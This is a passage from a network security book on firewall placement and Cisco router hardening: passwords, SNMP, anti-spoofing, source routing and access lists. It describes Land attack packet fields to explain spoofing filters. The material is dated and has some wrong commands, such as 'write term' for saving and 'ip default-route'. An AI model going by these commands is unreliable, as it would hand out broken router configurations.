116, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 116\n \nFigure 5.14: Where to place your firewall \nIn this design, all internal systems are protected by the firewall from Internet-based attacks. \nEven remote sites connected to the organization via the WAN link are protected. All systems \nthat are accessible from the Internet (such as the Web server and the mail relay) are isolated \non their own subnet. This subnet is referred to as a DMZ or demilitarized zone, because while \nit may be secure from attack, you cannot be 100 percent sure of its safety, as you are allowing \ninbound connections to these systems. \nUsing a DMZ provides additional protection from attack. Since some inbound services are \nopen to these hosts, an attacker may be able to gain high-level access to these systems. If \nthis occurs, it is less likely that additional internal systems will be compromised, since these \nmachines are isolated from the rest of the network. \nAdditional network cards can be added to the firewall in order to control other types of remote \naccess. For example, if the company has WAN links to business partners that are not officially \npart of the organization, another subnet could be created from an additional NIC card in the \nfirewall. All routers connecting to these remote business partners would then be located on \nthis subnet. The firewall would be able to control traffic between these sites and the internal \nnetwork. \nAdditionally, you can use the static packet filtering capability of your router to increase security \neven further. This provides a multilayered wall of protection at your network perimeter. If an \nexploit is found in one of your security devices, the second device may be able to patch the \nleak. \nThere are many variations of this basic design. For example, you could add an additional type \nof firewall to the configuration you saw in Figure 5.14 in order to enhance security even more. \nFor instance, if the firewall in the figure is a dynamic packet filter, you could place a proxy \nfirewall behind it in order to better secure your Internet connection. \nTip \nJust remember that it is always a good idea to place your firewall between the \nInternet and the assets you wish to protect, so that all communication sessions \nmust pass through the firewall. While this may sound like an extremely basic idea, \nyou might be surprised—if not shocked—at the way some organizations attempt to \ndeploy a firewall. \n \nChapter 6: Configuring Cisco Router Security \nFeatures \nIn the previous chapter, we discussed firewall theory and how the devices go about filtering traffic. In this chapter, \nwe will look at how to configure a Cisco router in order to secure network perimeters. Cisco has become a staple \nin providing Internet connectivity, so most likely you are using a Cisco router in order to connect to your Internet \n" }, { "page_number": 117, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 117\nService Provider. Since a router is required equipment for a dedicated WAN connection, knowing how to \nconfigure Cisco security features can also be useful for controlling traffic between business partners. \nCisco Routers \nCisco is arguably the number-one supplier of hardware routers. It has a diverse product line, which means it has a \nrouter to suit almost every configuration requirement. Whether you are using an analog dial-up, ISDN, leased line, \nFrame Relay, T1, or even a T3 circuit to connect to your ISP, Cisco has a number of products that can fit your \nneeds. \nA unique ability of the Cisco router series is that, as of IOS 11.3, reflexive filtering is supported. Reflexive \nfiltering allows a Cisco router to maintain connection session state. This means that while most routers only \nsupport static filtering, a Cisco router using IOS 11.3 or higher is capable of performing dynamic packet filtering. \nThis is extremely beneficial for the small shop that does not require a full-featured firewall, or for use on \nperimeters where a full-featured firewall is not cost effective (such as a WAN link to a business partner or a so-\ncalled “Chinese firewall”). This feature set can even be combined with an additional firewall solution to strengthen \na perimeter even further. Cisco routers running the newer IOS 12.1 can also filter based on connection time and \ncontext, further extending their usefulness as security devices. \nWhen selecting a router for Internet connectivity, most organizations have traditionally gone with a Cisco 2500 \nseries router. However, because the 2500 series routers are not very expandable, companies with newer \nimplementations have started to purchase the 2600 series that is modular, expandable, and has compatible \ninterfaces with other Cisco router families. In addition, businesses have begun to incorporate newer technologies \ninto their networks such as Fast Ethernet (100Mbps), Gigabit Ethernet (1000Mbps), VLANs (Virtual LANs), \nVPNs, digital telephony, and streaming multimedia. This demand has dramatically increased the variety of router \nofferings—even from a single vendor. \nA summary of the more popular models of the 2500 and 2600 series product lines is shown in Table 6.1. \nRemember that earlier Cisco models typically used an Attachment Unit Interface (AUI) connection for Ethernet \nsegments, so you may need to purchase a transceiver as well. \nNote \nA transceiver will convert between the DB15 pin connection used by an AUI connection, \nand the female RJ45 connection used in a twisted-pair environment. \nTable 6.1: Popular Models of the Cisco 2500 and 2600 Series \nCisco Model Number \nIncluded Ports \nSpeed \n2503 \n1 Ethernet, 1 BRI, 2 serial \n128K \nISDN, \n10 \nMbps \n2520 \n1 Ethernet (AUI), 1 Ethernet (RJ45), 1 BRI, \n1 Serial \n128K \nISDN, \n10 \nMbps \n2610 \n1 Ethernet (RJ45), 1 Network Module slot, \n2 WAN Interface Card slot, 1 Advanced \nIntegration Module (AIM) slot \nPort \nspecifi\nc \n(Maxi\nmum = \n100 \nMbps) \n2611 \n2 Ethernet (RJ45), 1 Network Module slot, \n2 WAN Interface Card slot, 1 AIM slot \nPort \nspecifi\nc \n(Maxi\nmum = \n100 \nMbps) \n" }, { "page_number": 118, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 118\nWhere to Begin \nCisco routers are extremely flexible devices. The number of configurable options can be downright daunting. For \nexample, the online “Cisco IOS Software Command Summary” for IOS 12.1 (the latest major OS release) is \nhundreds of pages long. Keep in mind this is a “summary,” not a fully detailed manual—not exactly something \nyou can toss in your shirt pocket! \nA full description of how to configure a Cisco router is beyond the scope of this book. This section will simply \nfocus on how to implement your security policies using this device. We will therefore assume the following: \nƒ \nIOS 12.0 or higher has been loaded on the router. \nƒ \nThe router is powered up and physically connected to your LAN and WAN. \nƒ \nBoth interfaces have a valid IP address and subnet mask. \nƒ \nYou can ping the router at the other end of the WAN located at your ISP. \nƒ \nYou are reasonably familiar with the Cisco command interface. \nOnce these requirements have been met, you are ready to start locking down your perimeter. \nBasic Security Tips \nThe place to start in securing your perimeter is to insure that the router itself does not become compromised. The \nrouter will be of little use in controlling traffic across your borders if Woolly Attacker can change the \nconfiguration. A Cisco router offers various levels of access: \nƒ User EXEC Mode \nƒ Privileged EXEC Mode \nUser EXEC Mode \nUser EXEC mode is the first mode of operation you reach when connecting to a Cisco router. If you are running a \ndirect console session, you are placed in user EXEC mode automatically. If you are connecting to the router via a \ntelnet session, you are first prompted for a terminal password. \nNote \nA Cisco router will deny all telnet session attempts if a terminal password has not been \nset. \nA Cisco router changes the terminal prompt, depending on which mode of operation you are currently using. The \nprompt always starts with the name of the router and ends with some special sequence to let you know where you \nare. Table 6.2 lists some of the more common prompts. \nDon’t worry about the meaning of the other prompts for now. We will cover them in the next section. \nTable 6.2: Cisco Command Prompts \nPrompt Appearance \nDescription \nrouter> \nUser EXEC \nmode \nrouter# \nPrivilege \nmode \nrouter(config)# \nGlobal \nconfigurati\non mode \nrouter(config-if)# \nInterface \nconfigurati\non mode \nWhile in user EXEC mode, a user is allowed to check connectivity and to look at statistics, but not to make any \ntype of configuration changes to the device. This helps to limit the amount of damage that can be done by an \nattacker if your terminal password is compromised or if the attacker can gain physical access to the device. \nPrivilege Mode \nA user must enter user EXEC mode before entering privilege mode. This means that a remote attacker must be \nable to compromise two passwords in order to gain full access to the router. Privilege mode, by default, is the big \n" }, { "page_number": 119, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 119\nkahuna. At this level of access, a user is free to change or even delete any configuration parameters. You enter \nprivilege mode by entering the command \nenable \npassword: privilege_password \nSince you use the command enable to gain privilege access, this mode is sometimes referred to as enable mode. In \nthe past, the command given to change the enable password was as follows: \nenable password new_password \nHowever, Cisco now recommends using the following command that uses a stronger encryption algorithm: \nenable secret new_password \nYou can actually specify up to 16 different levels (0–15) of privilege-level access, each with its own unique \npassword. In this case, the password a user enters when accessing privilege mode would determine what level of \nprivileged access the user receives. This can be useful if you need to allow an administrator access to some \nprivilege-level commands, but not all. To set a password for a specific privilege level, enter the command \nenable secret level new_password \nwhere level is replaced by some value between 0 and 15. The lower the value, the lower the level of privilege-level \naccess. \nDisabling All Unused Services \nA common security practice on any network-enabled device is to disable all unused services. Examples of services \nthat should be disabled if unused include: \nƒ \nSNMP \nƒ \nNTP (Network Time Protocol) \nƒ \nCDP (Cisco Discovery Protocol) \nNote \nNTP and CDP are enabled by default. To turn off CDP, use the no cdp run command. For \nNTP, use the ntp disable command on each interface that is not using NTP. \nChanging the Login Banner \nIt’s a good idea to change the logon screen banner so a customized message is displayed. If an attacker tries to \naccess your router, the last thing you want him to see is a “welcome” message. Your message should reflect your \norganization’s stance on unauthorized access to network hardware. Change the banner with the following \ncommand: \nbanner login # message # \nwhere # can actually be an ASCII-delimiting character. This character cannot be used in the message and is simply \nused to let the command know where the message ends—you can place your message over multiple lines in order \nto change its appearance. You must be in privilege mode to use this command. \nAn example of this command would be \nbanner login # Unauthorized access prohibited # \nChanging the Terminal Password \nA Cisco router running under 12.1 can support multiple concurrent telnet sessions. It is a good idea to change \nthese passwords on a regular basis to help insure that the device is not compromised. To change a password for \none these connections (the first—labeled ‘0’), enter privilege mode and enter the following commands: \nline vty 0 \nlogin \npassword 2SeCret4U \nTip \nRemember that Cisco passwords are case sensitive, so use a combination of cases to make \nthe password harder to guess. \nSince you cannot select which vty you wish to use when connecting remotely, Cisco recommends that you set all \nvty passwords to the same character string. \n" }, { "page_number": 120, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 120\nUsing Stronger Password Authentication \nA weakness of the Cisco password system in the past was that there was no accounting capability. Since each \nadministrator was using the same passwords, there was no audit trail to see who made which changes. Beginning \nwith IOS 12.0, Cisco has adopted a new security paradigm called AAA (or Authentication, Authorization, and \nAccounting) to account for this and other weakness in the password system: \nAuthentication This is the method of identifying users, whether via login/password, \nchallenge/response, messaging support, and/or encryption. AAA authentication is applied by \ncreating a named list of one or more authentication methods that are then bound to one or more \ninterfaces. \nAuthorization This is the method of controlling access, including one-time or service based \nauthorization, per-user account and profile, user group, and protocol-based access control (IP, IPX, \nARA, and telnet). \nAccounting This is the method of collecting information that is then used to bill, audit, and report \nnetwork activities. Types of information include user identities, start/stop times, commands issued \n(like FTP get), number of packets and/or bytes. Through accounting, users are associated with \nresources they have accessed. \nCisco has chosen to implement industry standard technologies along with AAA, including RADIUS, TACACS+ \n(Terminal Access Controller Access Control System), and Kerberos. Authentication configuration outside of AAA \ncannot work with these standards. Here is how Cisco implements them in AAA: \nRADIUS Routers are RADIUS clients, transmitting authentication information to a RADIUS \nserver. \nTACACS+ The database is maintained by a service running on a UNIX or NT machine. Routers \npass requests to the TACACS+ service. \nKerberos Kerberos is used to verify that users and the network services they use are really who \nand what they claim to be. Routers can verify this by analyzing the Kerberos ticket assigned to \nauthorized users. \nSNMP Support \nSimple Network Management Protocol (SNMP) can be used to collect statistics as well as to make configuration \nchanges to a Cisco router. This is done through the use of community strings. In brief, a community string is a \npassword system that identifies a specific level of access for a device (either read-only or read-write). For \nexample, most devices come preconfigured to use a community string of public for read-only access to the device. \nAnyone who accesses the router via SNMP using this community string is automatically granted access. \nBesides poor authentication, SNMP has another major security flaw: it transmits all information in clear text. \nAnyone monitoring the network can grab the community name from passing traffic. SNMP also uses UDP as a \ntransport. As you saw in Chapter 5, UDP can be extremely difficult to filter due to its connectionless state. \nFor these reasons, you should avoid using SNMP on your routers if possible. While the manageability can be a \nreal bonus in a large environment, this back-door access to your router can be a serious security concern. \nTip \nIf you must use SNMP, use SNMPv2. The latest version supports MD5 authentication to \nhelp improve security. While this security is not foolproof, it is far better than the original \nSNMP specification. Cisco router versions 10.3 and up support SNMPv2. \n" }, { "page_number": 121, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 121\nGuarding Your Configuration File \nThe configuration of a Cisco router can be displayed by entering the command \nwrite term \nor \nshow running-config \nThe configuration can even be backed up to a remote server using the TFTP protocol. A sample header from a \nCisco router configuration file is shown below: \n! Cisco router configuration file \nhostname lizzybell \nenable secret 5 $1$722$CE \nenable password SuperSecret \nline vty 04 \npassword SortaSecret \n! \nThe privilege mode (enable) password is encrypted using a one-way encryption algorithm. This way, anyone who \nsees your configuration file does not immediately become privy to this password. The enable password string is \nsimply used for backward compatibility. If this configuration file were mistakenly loaded on an older revision \nrouter that does not support encrypted passwords, this password would be used instead of the encrypted one. \nThe telnet session passwords are in clear text, however, so this file should be guarded as closely as possible. If this \nfile is loaded via TFTP, an attacker monitoring the network now has the first password required to access this \ndevice. To better safeguard this information, you can encrypt all passwords by typing the following command in \nglobal configuration mode: \nservice password-encryption \nThis will encrypt the memory copy of all password strings. In order to make this permanent, you need to save \nthese changes by typing \nwrite term \nor \ncopy running-config startup-config \nEven though all your password strings are now encrypted, you should still take precautions to safeguard the \nconfiguration file. Cracker programs exist that attempt to guess a password’s value by comparing the encrypted \nstring to entries located in a dictionary file. If a match is found, the clear text equivalent of the password is \nreturned. The only way to prevent this type of attack is to insure that even your encrypted password strings do not \nfall into the wrong hands. \nProtect Against Spoofing \nWoolly Attacker uses spoofing to transmit a packet that appears to originate from the secure side of a firewall—\nwhen in actuality it comes from an unsecured network. There are several methods to prevent spoofing on Cisco \nrouters: \nƒ \nUse access lists: configure input access lists on all interfaces to pass traffic only if it \ncomes from known (or expected) source addresses. All other traffic is denied. \nƒ \nDisable source routing: source routing should be disabled on all interfaces. (See the later \nsection in this chapter for more on “Source Routing.”) \nƒ \nTurn off minor services: also referred to as small servers, these services normally aren’t \ncritical to most network infrastructures but have the potential of being exploited. The \ncommand no service tcp-small-servers is an example of how to turn these off for IP \ncommunications. \n" }, { "page_number": 122, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 122\nDisable Directed Broadcasts \nDoS (denial-of-service) attacks work by flooding a target computer with so much information (or so many \nconnection requests) that the target is unable to service legitimate requests. One of the tools used by hackers to \nachieve these types of attacks is the capability of routers to forward directed broadcasts. To disable directed \nbroadcasts, enter \nno ip directed broadcastRouting \nBy default, Cisco routers ship with IP routing enabled, so you won’t have to change this functionality. You do, \nhowever, need to consider how best to update your router regarding which subnets you are running on your \ninternal network. The router automatically knows about any locally connected networks. In order to reach any \nsubnets beyond these, you must tell a router specifically how to reach them. \nSometimes this is not an issue. For example, take a look at Figure 6.1. Our firewall is performing network address \ntranslation (NAT) for our internal network. All traffic the router sees will appear as though it came from the \nlocally attached segment. In this case, no other route entries are required beyond a default route. The router does \nnot need to know about the 192.168.1.0 network because we are using NAT. \n \nFigure 6.1: Our router does not need a route entry for the internal network because the firewall is performing \nNAT. \nIf you do have additional subnets that the router will need to know about, you need to decide between creating \nstatic entries on the router (static routing) or using a dynamic protocol such as RIP or OSPF so the router can \nreceive route information automatically (dynamic routing). There are strengths and weaknesses to either choice, \ndepending on your configuration. \nStatic routing is far more secure from a security perspective. If the router has been programmed with your route \nconfiguration, an attacker cannot change this information without compromising the router. If a dynamic protocol \nis used, an attacker may be able to send false updates to the router, thus corrupting the router table. \nDynamic protocols are useful if you are running multiple paths to the same network. For example, if you had \nmultiple links leading to the Internet, it might be beneficial to use a dynamic routing protocol for redundancy or \neven load balancing. If you must use a dynamic routing protocol, use one that supports authentication such as \nOSPF. This will at least afford you some level of security. Routing protocols, such as RIP, simply trust that any \nhost sending them routing information must know what it is talking about. \nNote \nSee Chapter 3 for more on dynamic routing protocols. \nMost of the Internet connections in use have but a single link between the organization and its ISP. For these \nenvironments, static routing is preferred. The slight maintenance increase caused by having to manually configure \nyour routing table will be well worth the additional security. \nConfiguring Static Routing \nAt a minimum, you will need to configure your router with a default route setting. The default route setting tells \nthe router, “If you do not have a routing table entry for a particular subnet, forward the data to this other router and \n" }, { "page_number": 123, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 123\nlet that router figure out how to deliver it.” The default route should be configured to use your ISP’s router at the \nother end of the WAN link. \nA default route can be configured by entering global configuration mode and typing the command \nip default-route xxx.xxx.xxx.xxx \nwhere xxx.xxx.xxx.xxx is the local IP address of the default router. Once you have created a default route, you will \nneed to enter static routes for each of your internal subnets using legal addresses. While still in global \nconfiguration mode, enter the command \nip route yyy.yyy.yyy.0 255.255.255.0 xxx.xxx.xxx.xxx 1 \nYou must do this once for each subnet you need to add. The command breaks down as follows: \nip route Add a static IP routing entry. \nyyy.yyy.yyy.0 Replace this value with the IP subnet address. \n255.255.255.0 Replace this value with a valid subnet mask address. \nxxx.xxx.xxx.xxx Replace this value with the IP address of the next hop router. \n1 This is the metric or cost associated with following this path. Use a value of 1 unless you have multiple paths to \nthe same destination. In this case, set the most preferred route to 1 and the alternate route to 2. \nLet’s walk through an example to see how this would be configured. If you look at Figure 6.2, you will see that \nyou actually have multiple routers within your environment that you need to configure. \n \nFigure 6.2: Defining static routes on multiple routers \nNotice that each router has a default route setting. If you start at the very back of the network (206.121.76.0 or \n206.121.78.0), you can see that the default route entries lead all the way out to the Internet. This is a good thing, \nbecause it is all the subnets out on the Internet that we wish to avoid programming into our routers. The default \nroute acts as a catchall for any undefined routes. \nNote \nOur two most distant routers in Figure 6.2 (206.121.75.2 and 206.121.77.2) are only using \na default route. There are no static route entries. This is because you need to pass through \nthe default router in order to reach any subnet that is not directly attached to these devices. \nWhile you could add static route entries, they would be redundant. \nFinally, notice that we did not add a route entry into any of our routers for the DMZ. This is because it is \nunnecessary. Our Internet router is directly attached to this segment, so it already knows how to get there. As for \nthe other routers, the DMZ can be reached by simply utilizing the default route entry. \nSource Routing \nWe need to make one final routing entry before we are finished. This routing change is to disable source routing. \nTypically, IP packets contain no routing information. The packets leave selecting the best route up to the network \nrouting hardware. It is possible, however, to add to the header information the route you wish to take when \naccessing a remote system. This is referred to as source routing. \nWhen a router receives a source route packet, it forwards the information along to the next hop defined in the \nheader. Even if the router is sure that it knows a far better path for reaching the remote system, it will comply with \nthe path specifications within the packet header. Typically, when a remote system receives a source route packet, \nit will reply to the request along the same specified path. \n" }, { "page_number": 124, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 124\nSource routing can be used by an attacker to exploit potential back doors within your network. For example, let’s \nsay that your company has invested a lot of time and money in a proper firewall solution. You have taken every \neffort to lock down your Internet connection as tightly as possible. \nLet’s also assume that you have a WAN link to a remote business partner that connects to your network behind the \nfirewall. This organization also has an Internet connection, but unlike yours, it is made up of very trusting souls \nwho think all the security hype is a marketing ploy by firewall vendors. For this reason, your business partner has \nzero protection at its network perimeter. \nUsing source routed packets, it is possible for a potential attacker to send traffic first to your remote business \npartner, then have the traffic sent over the WAN link to your network by including source route information within \nthe packets of data. Despite all your security efforts, Woolly Attacker has found an easy access entrance to your \nnetworking environment. The only thing missing is valet parking. \nSource routing can be a bad thing and should be disabled at all your network perimeters. The only legitimate \nreason for allowing source-routed packets is if you need to do connectivity diagnostics across specific links on the \nInternet. Since this is not an activity many of us must do, it is best to leave the feature disabled. \nTo disable source routing, enter global configuration mode and enter the command \nno ip source-route \nCisco Security Features \nTable 6.3 provides a list of all the various security features in the Cisco IOS (some fairly recent): \nTable 6.3: Cisco IOS Security Features \nFeatures \nDescription \nStandard Access Lists and Static \nExtended Access Lists \nEnables basic filtering by evaluating packets at \nthe network layer (some extended access lists \ncan evaluate information at transport layer). \nDynamic Access Lists (also known \nas Lock-and-Key) \nProvides temporary access to authenticated \nusers. \nReflexive Access Lists \nAllows incoming TCP or UDP. packets only if \nthey belong to a session initiated from inside the \nfirewall. \nTCP Intercept \nProtects against SYN flood attacks (a type of \nDoS attack). \nContext-based Access Control \nExamines application layer information to \ndetermine not just state, but context of all TCP \nand UDP connections in order to dynamically \nopen or close connections as necessary. Also \nresponsible for alerts and logs. \nIntrusion Detection \nCompares all network traffic with stored \nsignatures, reacting to detected intrusions by \nsending an alarm, resetting the connection, or \ndropping the connection. \nAuthenticating Proxy \nApplies user-based access policies (as opposed \nto group or IP-based policies). \nPort/Application Mapping \nEnables context-based access controls to work \non non-registered (non-standard) or custom \nports. \nNAT \nHides private IP addresses from the public \nInternet. \nUser Authentication and \nAuthorization \nVerifies identity and permission level based on \nuser accounts. \nAt the core of all of these security methods is the access list. Cisco access lists (also called filters) are used to \nselectively pass or block traffic received by a Cisco router. The router evaluates each packet received against the \ncriteria defined in an access list, such as the source or destination address of the information, the upper-layer \n" }, { "page_number": 125, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 125\nprotocol, the time, user identify, or other factors. Access lists are useful for controlling traffic that attempts to pass \nyour network perimeter. Since a router is typically used to segregate or partition network segments anyway (for \ninstance, to separate your network from a business partner or the Internet), you can see why these devices contain \nsome form of advanced filtering capability. \nCisco routers provide two methods of filtering traffic. The simplest is the standard access list, while extended \naccess lists are used for more granular control. Once an access list is created, it is applied to a specific interface on \nthe router. The access list is then told to screen either inbound network traffic (traffic coming from the attached \nnetwork to the interface) or outbound network traffic (traffic leaving the router and headed towards the attached \nnetwork). This ability to filter either inbound or outbound traffic can be a real time-saver in complex \nconfigurations. \nIn Cisco IOS 12.1, IP and IPX extended access lists can also be used with time ranges. Permit and deny statements \nare then activated in accordance with their associated time ranges. Other advantages are: \nIncreased control Resources (such as IP address/mask pair and port number, policy routing, or on-\ndemand link creation) are linked to available times. \nBetter integration Time-based policy can be linked with Cisco’s firewall and IPSec products. \nReduced cost Traffic can be rerouted to less expensive links based on time of day. \nIncreased efficiency Access lists don’t have to be processed at open times of the day. \nTo create a time range, use the following command: \ntime-range {name of time range} \nTo define the actual time range, enter this command: \nperiodic {days of the week} {hh:mm} to {days of the week} {hh:mm} \nAccess List Basics \nAccess lists are generated by creating a number of test conditions that become associated with list identifier \nnumbers. Access lists are created while in global configuration mode and use the following syntax: \naccess-list {list #} permit/deny {test condition} {time range} \nYou would repeat this command for every test condition you wish to use in order to screen traffic (such as allow \nSMTP, deny HTTP, and so on). The list number you use identifies which protocol you would like to apply these \nrules to. Table 6.4 shows protocols associated with names, and Table 6.5 shows protocols associated with list \nnumbers. \nTable 6.4: Cisco Access Control Lists By Name \nProtocol \nApollo Domain \nIP \nIPX \nISO CLNS \nNetBios IPX \nSoure-route bridging NetBIOS \nTable 6.5: Sample of Cisco Access Control Lists By Number \nProtocol \nList Type \nRange \nIdentifi\ner \nIP \nStandard \n1–99; \n1300–\n" }, { "page_number": 126, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 126\nTable 6.5: Sample of Cisco Access Control Lists By Number \nProtocol \nList Type \nRange \nIdentifi\ner \n1999 \nIP \nExtended \n100–\n199; \n2000–\n2699 \nEthernet Type codes \nN/A \n200–\n299 \nAppleTalk \nN/A \n600–\n699 \nEthernet Addresses \nN/A \n700–\n799 \nIPX \nStandard \n800–\n899 \nIPX \nExtended \n1000–\n1099 \nNote \nSome protocols require that their associated access lists are identified only by name, \nothers only by number, and the rest can either/or. \nNotice that only one type of filtering is supported for certain protocols. As of Cisco IOS 11.2 and higher, the range \nidentifiers used by IP can be replaced by an alphanumeric name. This name can be up to 64 characters long but \nmust start with an alphabetic character. The name must be unique, and each name can only describe a single set of \nstandard or extended filters. You cannot combine the two. The syntax for creating an access list name is \nIP access-list standard/extended {name} \nTip \nUsing names instead of access list numbers can be extremely beneficial. Doing so extends \nthe number of unique lists you can create and allows you to associate a descriptive name to \na particular set of filters (such as “spoofing”). Also, reflexive filters can only be associated \nwith an access list name. You cannot use an access list identifier number. \nAccess lists will be processed in the order you create them: if you create five filter conditions and place them in \nthe same access list, the router will evaluate each condition in the order it was created until the first match is \nfound. Conditions are processed as “first fit,” not “best fit,” so it is important to pay close attention to the order \nyou use. For example, let’s say you have an access list that states \nƒ \nAllow all internal systems full IP access to the Internet. \nƒ \nDo not let any internal systems telnet to hosts on the Internet. \nSince the first rule states, “All outbound traffic is OK,” you would never actually make it to the second rule. This \nmeans that your internal users would still be able to use telnet. \nOnce you have created an access list that you wish to apply to your router, enter configuration mode for a specific \ninterface and enter the command \n{protocol} access-group {list # or name} in/out \nTo remove an access list from an interface (always a good thing to do if you are testing a new filter), simply \nprecede the command with the word no as follows: \nno {protocol} access-group {list # or name} in/out \nLikewise, to delete an entire access list, enter the command \nno access-list {list # or name} \nKeep in mind that this will delete all filter conditions associated with a particular access list number or name. One \nof the biggest drawbacks of access lists is that you cannot edit entries. This can make data entry a bit tedious. For \n" }, { "page_number": 127, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 127\nexample, if you have created 15 access list entries and realize that you actually want entry 11 processed after entry \n13, you must delete the entire list and recreate it from scratch. \nTip \nCreate your access lists offline in a text editor. Once you have the filters in the correct \norder, simply copy the rules to the Windows Clipboard and use the Paste ability of your \nterminal emulator. This also allows you to keep a local backup of all your filter conditions. \nAll access filters have an implicit deny at the end. This means that if you do not tell the router to specifically allow \na certain type of traffic to pass, it will assume that it should be blocked. For example, if your access list states, \n“Traffic from the subnet 192.168.1.0 is OK to let through,\" the router will assume that it should block traffic from \nall subnets except 192.168.1.0. This feature helps to insure that you do not let anything through that you did not \nmean to. \nStandard Access Lists \nStandard access lists allow you to filter on source IP address. This is useful when you wish to block all traffic from \na specific subnet or host. A standard access list does not look at the destination IP address or even the service; it \nmakes its filtering determination based solely on the source address of the transmitting system. \nWhile this sounds a bit limiting, it can actually be quite useful. Examine Figure 6.3. Here we have a very simple \nnetwork design. There is only one way in and out of the network, which is through the router. The internal \nnetwork segment uses an IP subnet address of 206.121.73.0. \nIn this environment, the router should never see any traffic originating from the Internet that appears to have \noriginated from the IP subnet 206.121.73.0. This is because that segment is directly connected to the Ethernet port \nof the router. While the router will see traffic originating from this subnet on its Ethernet port, it should never be \ndetected off of the serial (WAN) port. \n \nFigure 6.3: Using standard access lists \nIP spoofing is a process in which an attacker pretends to be a system on your local network transmitting \ninformation, even though he is off at some remote location. This can be used to exploit certain system \nvulnerabilities. For example, Microsoft Windows is vulnerable to a type of attack known as Land. A Land attack \npacket has the following attributes: \nSource IP: The IP address of the system under attack \nDestination IP: The IP address of the system under attack \nTransport: TCP \nSource port: 135 \n" }, { "page_number": 128, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 128\nDestination port: 135 \nFlag setting: SYN=1 \nThere are other ports and settings that can be used, but this should give you the general idea. The attack fools the \nsystem into thinking it is talking to itself. This will produce a race condition, which will cause the system to \neventually hang or lock up. \nYou may be thinking, “No problem, I plan to block all inbound connection requests, so this packet would never \nget through because the SYN flag is set high.” Not true, Grasshopper: look at the source address. When the router \nevaluates this packet, it may very well think that the packet was received from the internal network. \nWhile Cisco routers do not have this problem (they maintain the association of the packet with the interface it was \nreceived on), many routers do. If your access rules state, “Port 135 from the internal network is OK to let \nthrough,” the router will approve the packet of data, pass the information along to the routing process, which \nwould then pass the traffic along to the Ethernet segment. \nSo how do you solve this problem? Since you will never see legitimate traffic originating from the Internet, which \nuses your internal subnet address, there will be no loss in connectivity if you filter out such traffic. This is called a \nspoofing filter, because you are insuring that no traffic that is trying to spoof your internal address will be allowed \nto pass. \nIt is also a good idea to place an inbound filter on your Ethernet port that states, “Only accept traffic from the \n206.121.73.0 subnet.\" This helps to insure that none of your internal users attempts a spoofing attack on some \nother network. As administrator, it is your job to not only protect your own environment, but also to make sure \nyou do not inadvertently make someone else’s life miserable. \nYou can create spoofing filters using standard access lists. The syntax for a standard access list entry is \naccess-list {list # or name} permit/deny {source} {mask} \nSo you could create the following access list entries in global configuration mode on the router in Figure 6.3: \naccess-list 1 deny 206.121.73.0 0.0.0.255 \naccess-list 2 permit 206.121.73.0 0.0.0.255 \nAccess list 1 would be applied by entering configuration mode for the WAN interface and entering the command \nip access-group 1 in \nLikewise, access list 2 would be applied by entering configuration mode for the Ethernet interface and entering the \ncommand \nip access-group 2 in \nYou may notice that the mask value looks a little strange. This is because this value is a pattern match, not a \nsubnet mask. A pattern match uses the following criteria when evaluating a test condition: \n0 The corresponding byte in the defined address must match the test condition exactly. \n1 This is a wildcard character: any value in this byte is considered a match. \nSo in this example our pattern match says, “Any IP address which contains the byte values 206.121.73.\" As long \nas the first three bytes match the source IP address, the access list test condition considers it a match. \nTo match all network traffic, use the following address and mask: \n0.0.0.0 255.255.255.255 \nThis tells the Cisco router that all traffic is to be considered a match. When you write your access rules, this \naddress and mask can simply be replaced by the word “any.” This is not very useful for standard access lists (if \nyou do not want to accept any traffic, it’s easier to just pull the plug), but it will come in handy when we get into \nextended access lists in the next section. \nAccess List Pattern Matching \nIf you think of the pattern match value as “an anti-subnet mask,” you’ll be in pretty good shape. The pattern match \nwill always be the exact opposite of what you would use for a subnet mask. This is pretty easy to follow if you are \nfiltering full subnet classes, but it can get a bit confusing if you are working with true subnetting. \n" }, { "page_number": 129, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 129\nFor example, let’s say that instead of a full class C network, you are only using a portion of this class C address \nspace. Let’s assume that the network address is 206.121.73.64 and the subnet mask is 255.255.255.224. In this \ncase, what would you use for a pattern match to insure that you are only filtering on your network space? \nAll TCP/IP address space is actually created using a binary number system. We use decimals simply because these \nare easier for human consumption. In order to determine the pattern match you will use, you first have to convert \nthe last byte of the subnet mask to binary: \n224 = 128 + 64 + 32 = 11100000 \nIn the last byte you are using three bits for networking and five bits to identify each unique host. In order to ignore \nany host on your network, you would use a pattern match that has all the host bits set high, like this: \n00011111 = 16 + 8 + 4 + 2 + 1 = 31 \nSo in order to accommodate your new network address and subnet mask, you would need to change your access to \nthe following: \naccess-list 1 deny 206.121.73.64 0.0.0.31 \naccess-list 2 permit 206.121.73.64 0.0.0.31 \nIn effect, you have told your access list, “Filter the packet when you see an address space value 206.121.73.64 – \n206.121.73.95 (64 + 31).” This will let you screen for your small chunk of this class C address space—without \nhaving to filter or allow more than you need to. \n \nBesides spoofing rules, why else might you use standard access lists? Standard access lists are extremely effective \nat blocking access from any undesirable remote site. This could be known attackers, mail spammers, or even \ncompetitors. \nRemember that this connection is yours to manage as you see fit. There is no requirement that once you are \nconnected to the Internet you must accept traffic from all sources. While accepting all traffic is considered the \npolite thing to do, it may not always make the most business sense. \nFor example, there are mailing lists and organizations that have dedicated resources to identifying spam sites. \nSpam, or unsolicited advertising e-mail, can be a waste of organizational resources at best, or it can cause a denial \nof service at worst. Many administrators now filter traffic from sites known to support (or at the very least fail to \nprevent) spammers and their activities. All traffic is filtered, because a site that does not control outbound spam \nmail typically makes no effort to prevent other types of attacks from being launched against your network. \nTip \nA Cisco interface can only accept one access list per port, per direction. This means that \nyou should only apply a standard access list when you won’t need an extended access list. If \nyou require the increased flexibility of an extended access list, simply incorporate your \nfilters into a single list. \nStatic Extended Access Lists \nExtended access lists take the concept of standard access lists one step further. Instead of simply 